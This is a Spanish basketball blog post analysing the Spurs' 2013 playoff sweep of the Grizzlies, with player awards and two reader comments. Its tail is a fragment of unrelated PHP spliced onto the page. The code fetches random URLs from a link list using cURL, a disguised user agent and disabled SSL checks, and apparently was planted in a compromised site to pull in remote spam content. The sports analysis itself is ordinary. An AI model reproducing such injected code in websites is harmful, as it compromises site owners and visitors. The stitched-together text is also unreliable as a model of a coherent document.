Análisis San Antonio Spurs 4 – Memphis Grizzlies 0

03 de June de 2013 por TheDeerHunter

Nos hemos tomado nuestro tiempo para asimilar la debacle de una de nuestras debilidades este año. Los Spurs eran favoritos a priori pero muy pocos podían esperar que sacaran nuevamente la escoba a pasear. Una lástima de final para unos Grizzlies que pese a todo han hecho historia. Y más que historia, leyenda es lo que pueden escribir Duncan, Parker y compañía las próximas semanas. Año impar…

La barrida es en buena parte engañosa. Exceptuando el baño del primer partido la eliminatoria se ha movido con la igualdad que muchos preveíamos. Dos choques resueltos en la prórroga y otro por 7 puntos no es la inmensa diferencia que refleja el marcador. No sabremos nunca qué hubiera pasado si Memphis se hubiera llevado el segundo y hubiesen tenido un punto más de suerte. Quizá el resultado global hubiera cambiado poco, porque en lo que sí hemos visto muy superiores a los Spurs es en esa experiencia de la que se comenta que es un grado y que muchos jóvenes subestiman. El tablero dispuesto por Popovich y controlado a su antojo, la increíble figura de Tim Duncan tan infravalorado defensivamente a veces, el liderazgo de Tony Parker, Manudo a cuenta gotas… La facilidad con la que han diseccionado la mejor defensa de la liga nos deja atónitos, por no hablar de ese infierno defensivo que han desplegado. El campeón Miami es favorito mientras siga vivo pero cuidado con este equipo magnífico que se gestó allá por el 97.

La decepción ahora mismo es muy grande en Memphis pero no se puede perder la perspectiva. Han firmado una temporada inolvidable y aún tienen cuerda. Debería bastar con algún retoque, quizá encontrar un Kawhi Leonard en lugar de Prince (¿o consolidar a Pondexter?) y mejorar su segunda unidad. No se sabe lo que deparará el futuro pero lo normal es que vuelvan a verse en más de éstas. Tienen una gran base para ello. 

PREMIOS

MVP: Es difícil quedarse con uno. Por un lado Tony Parker, punta de lanza con más de 24 puntos, casi 10 asistencias, más de 3 rebotes y 2 robos. Por el otro, Tim Duncan, con más de 15 puntos, 9 rebotes, 3 asistencias y 3 tapones, además de amargar la vida a Randolph como hacía tiempo que no veíamos hacer a nadie. Por último, hay que nombrar a Popovich sí o sí.

Sorpresa: A la chita callando McGrady se mete en una finalísima. Fuera de coñas, la sorpresa ha sido que los Spurs han dado de su propia medicina a los Grizzlies. La mejor defensa de la liga parecía más de los primeros que de los segundos.

Decepción: Ha sido una serie para olvidar de Zach Randolph pero el bajísimo rendimiento de Tayshaun Prince y Tony Allen ha sido clave para que los Spurs se pudieran cerrar bien por dentro. En realidad, únicamente Quincy Pondexter ha superado el 50% en tiros. La mayoría ni siquiera han alcanzado el 40% de acierto.

Esfuerzo en vano: No ha sido una eliminatoria digna de todo un Top 10 de la liga y mejor defensor del año como Marc Gasol. Ha sufrido mucho pero rara vez se puede decir que no dé la cara. Únicamente 14 puntos con bajo nivel de acierto pero 10 rebotes, 4 asistencias, 1 robo y dos tapones. Por intentarlo que no quede. Sumar siempre.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Buen análisis. A mí también me ha parecido decepcionante la serie de Conley: porcentajes muy pobres, muchas más pérdidas que recuperaciones y ningún control sobre lo que ocurría sobre el parquet.

    En realidad, te paras a pensar que Zach, Prince, Conley y Allen han jugado muy por debajo de su potencial, y casi que hasta sorprende que los Grizz pudiesen llevarse al menos un par de partidos.

      Citar

  2. Ruxixón dice:
    #2

    De Twitter,Duncan ha jugado finales NBA en 3 décadas.Está todo dicho,equipo que ha pasado por varias fases en torno al mejor PF de todos los tiempos,jugando más defensivo o más rápido,sea como fuere,equipo para recordar para el resto de los tiempos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>